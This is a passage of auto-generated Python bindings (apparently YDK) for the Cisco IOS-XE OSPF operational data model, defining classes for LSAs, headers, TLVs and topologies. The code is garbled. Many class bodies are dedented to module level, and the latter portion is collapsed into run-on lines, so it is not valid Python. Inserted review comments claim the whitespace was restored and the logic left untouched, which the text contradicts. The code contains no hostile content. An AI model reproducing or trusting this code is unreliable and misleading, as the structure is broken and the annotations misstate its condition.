            ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
            ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
            ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])),
            ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])),
        ])
        self.referenced_ls_type = None
        self.referenced_link_state_id = None
        self.referenced_adv_router = None
        self.num_of_prefixes = None
        self._segment_path = lambda: "ia-prefix"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value)


class Ospfv3Link(Entity):
    # YANG list "ospfv3-link" keyed by (interface-id, neighbor-interface-id,
    # neighbor-router-id); nested under link-scope-lsa in the original model.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link, self).__init__()

        self.yang_name = "ospfv3-link"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id']
        self._child_classes = OrderedDict([])
        # OrderedDict literal continues on the next source line (chunk is line-mangled).
        self._leafs = OrderedDict([
            ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])),
            ('neighbor_interface_id', (YLeaf(YType.uint32,
# NOTE(review): auto-generated ydk bindings; whitespace restored, logic untouched.
# Completes Ospfv3Link.__init__'s _leafs literal begun on the previous line.
                                                   'neighbor-interface-id'), ['int'])),
            ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])),
            ('type', (YLeaf(YType.uint8, 'type'), ['int'])),
            ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
        ])
self.interface_id = None
self.neighbor_interface_id = None
self.neighbor_router_id = None
self.type = None
self.metric = None
# Three-key list: all keys appear as predicates in the segment path.
self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']"
self._is_frozen = True

def __setattr__(self, name, value):
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value)


class Ospfv3PrefixList(Entity):
    # YANG list "ospfv3-prefix-list" keyed by prefix.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, self).__init__()

        self.yang_name = "ospfv3-prefix-list"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['prefix']
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
            ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
        ])
        self.prefix = None
        self.prefix_options = None
        self._segment_path = lambda: "ospfv3-prefix-list" + "[prefix='" + str(self.prefix) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, ['prefix', 'prefix_options'], name, value)


class Ospfv3IaPrefix(Entity):
    # YANG list "ospfv3-ia-prefix" keyed by prefix.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    # Body of __init__ continues on the next source line (chunk is line-mangled).
    def __init__(self):
# NOTE(review): auto-generated ydk bindings; whitespace restored, logic untouched.
# Body of Ospfv3IaPrefix.__init__ whose 'def' line precedes this chunk line.
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, self).__init__()

        self.yang_name = "ospfv3-ia-prefix"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['prefix']
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
            ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
        ])
        self.prefix = None
        self.prefix_options = None
        self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value)


class MultiTopology(Entity):
    # YANG list "multi-topology" keyed by name.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology, self).__init__()

        self.yang_name = "multi-topology"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['name']
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('name', (YLeaf(YType.str, 'name'), ['str'])),
        ])
        self.name = None
        self._segment_path = lambda: "multi-topology" + "[name='" + str(self.name) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology, ['name'], name, value)


class Tlv(Entity):
    # YANG container "tlv": traffic-engineering link TLV data.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv, self).__init__()

        self.yang_name = "tlv"
        self.yang_parent_name = "link-scope-lsa"
        # __init__ body continues on the next source line (chunk is line-mangled).
        self.is_top_level_class = False
# NOTE(review): auto-generated ydk bindings; whitespace restored, logic untouched.
# Continuation of Tlv.__init__ begun on the previous chunk line.
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])),
            ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
            ('local_if_ipv4_addr', (YLeafList(YType.str, 'local-if-ipv4-addr'), ['str','str'])),
            ('local_remote_ipv4_addr', (YLeafList(YType.str, 'local-remote-ipv4-addr'), ['str','str'])),
            ('te_metric', (YLeaf(YType.uint32, 'te-metric'), ['int'])),
            ('max_bandwidth', (YLeaf(YType.str, 'max-bandwidth'), ['Decimal64'])),
            ('max_reservable_bandwidth', (YLeaf(YType.str, 'max-reservable-bandwidth'), ['Decimal64'])),
            ('unreserved_bandwidth', (YLeaf(YType.str, 'unreserved-bandwidth'), ['Decimal64'])),
            ('admin_group', (YLeaf(YType.uint32, 'admin-group'), ['int'])),
        ])
        self.link_type = None
        self.link_id = None
        self.local_if_ipv4_addr = []
        self.local_remote_ipv4_addr = []
        self.te_metric = None
        self.max_bandwidth = None
        self.max_reservable_bandwidth = None
        self.unreserved_bandwidth = None
        self.admin_group = None
        self._segment_path = lambda: "tlv"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv, ['link_type', 'link_id', 'local_if_ipv4_addr', 'local_remote_ipv4_addr', 'te_metric', 'max_bandwidth', 'max_reservable_bandwidth', 'unreserved_bandwidth', 'admin_group'], name, value)


class UnknownSubTlv(Entity):
    # YANG list "unknown-sub-tlv" keyed by type: raw undecoded sub-TLVs.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv, self).__init__()

        self.yang_name = "unknown-sub-tlv"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['type']
        self._child_classes = OrderedDict([])
        # OrderedDict literal continues on the next source line (chunk is line-mangled).
        self._leafs = OrderedDict([
            ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
            ('length', (YLeaf(YType.uint16, 'length'),
# NOTE(review): auto-generated ydk bindings; whitespace restored, logic untouched.
# Completes UnknownSubTlv.__init__'s _leafs literal begun on the previous line.
                                                      ['int'])),
            ('value', (YLeafList(YType.uint8, 'value'), ['int'])),
        ])
self.type = None
self.length = None
self.value = []
self._segment_path = lambda: "unknown-sub-tlv" + "[type='" + str(self.type) + "']"
self._is_frozen = True

def __setattr__(self, name, value):
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv, ['type', 'length', 'value'], name, value)


class AreaScopeLsa(Entity):
    # YANG list "area-scope-lsa" keyed by (lsa-type, adv-router); holds the raw
    # LSA bytes plus decoded OSPFv2/OSPFv3 representations.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa, self).__init__()

        self.yang_name = "area-scope-lsa"
        self.yang_parent_name = "intf-link-scope-lsas"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['lsa_type','adv_router']
        # OrderedDict literal continues on the next source line (chunk is line-mangled).
        self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External)), ("ospfv3-lsa", ("ospfv3_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link)), ("ospfv3-prefix", ("ospfv3_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix",
# NOTE(review): auto-generated ydk bindings; whitespace restored, logic untouched.
# Completes AreaScopeLsa.__init__'s _child_classes literal from the previous line.
                        OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix))])
self._leafs = OrderedDict([
    ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
    ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])),
    ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])),
    ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])),
])
self.lsa_type = None
self.adv_router = None
self.decoded_completed = None
self.raw_data = []

# Singleton decoded-LSA containers plus keyed child lists.
self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa()
self.ospfv2_lsa.parent = self
self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa"

self.ospfv3_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa()
self.ospfv3_lsa.parent = self
self._children_name_map["ospfv3_lsa"] = "ospfv3-lsa"

self.ospfv2_link = YList(self)
self.ospfv2_topology = YList(self)
self.ospfv2_external = YList(self)
self.ospfv3_link = YList(self)
self.ospfv3_prefix = YList(self)
self.ospfv3_ia_prefix = YList(self)
self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']" + "[adv-router='" + str(self.adv_router) + "']"
self._is_frozen = True

def __setattr__(self, name, value):
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa, ['lsa_type', 'adv_router', 'decoded_completed', 'raw_data'], name, value)


class Ospfv2Lsa(Entity):
    # YANG container "ospfv2-lsa": decoded OSPFv2 LSA (header + body).
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, self).__init__()

        self.yang_name = "ospfv2-lsa"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # OrderedDict literal continues on the next source line (chunk is line-mangled).
        self._child_classes = OrderedDict([("header", ("header",
OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv2-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, [], name, value) class Header(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])), ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])), ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])), ]) self.lsa_id = None self.opaque_type = None self.opaque_id = None 
self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self.flag_options = Bits() self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value) class LsaBody(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network))]) self._leafs = OrderedDict([ ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])), ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])), ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])), ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])), ]) self.num_of_links = None self.summary_mask = None self.external_mask = None self.body_flag_options = Bits() self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, 
value) class Network(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])), ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ]) self.network_mask = None self.attached_router = [] self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value) class Ospfv2Link(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link, self).__init__() self.yang_name = "ospfv2-link" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['link_id','link_data'] self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology))]) self._leafs = OrderedDict([ ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ]) self.link_id = None self.link_data = None self.type = None self.ospfv2_topology = YList(self) self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']" self._is_frozen = True def 
__setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value) class Ospfv2Topology(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "ospfv2-link" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2Topology(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): 
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2External(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External, self).__init__() self.yang_name = "ospfv2-external" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ]) self.mt_id = None self.metric = None self.forwarding_address = None self.external_route_tag = None self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value) class Ospfv3Lsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, self).__init__() self.yang_name = "ospfv3-lsa" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header)), ("lsa-body", ("lsa_body", 
OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv3-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, [], name, value) class Header(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv3-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader))]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])), ]) self.lsa_id = None self.lsa_hdr_options = Bits() self.lsa_header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader() self.lsa_header.parent = self self._children_name_map["lsa_header"] = "lsa-header" self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, 
['lsa_id', 'lsa_hdr_options'], name, value) class LsaHeader(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, self).__init__() self.yang_name = "lsa-header" self.yang_parent_name = "header" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ]) self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self._segment_path = lambda: "lsa-header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value) class LsaBody(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv3-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix)), ("ia-router", ("ia_router", 
OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix))]) self._leafs = OrderedDict([ ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])), ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])), ]) self.lsa_flag_options = Bits() self.lsa_body_flags = Bits() self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self.prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix() self.prefix.parent = self self._children_name_map["prefix"] = "prefix" self.ia_router = 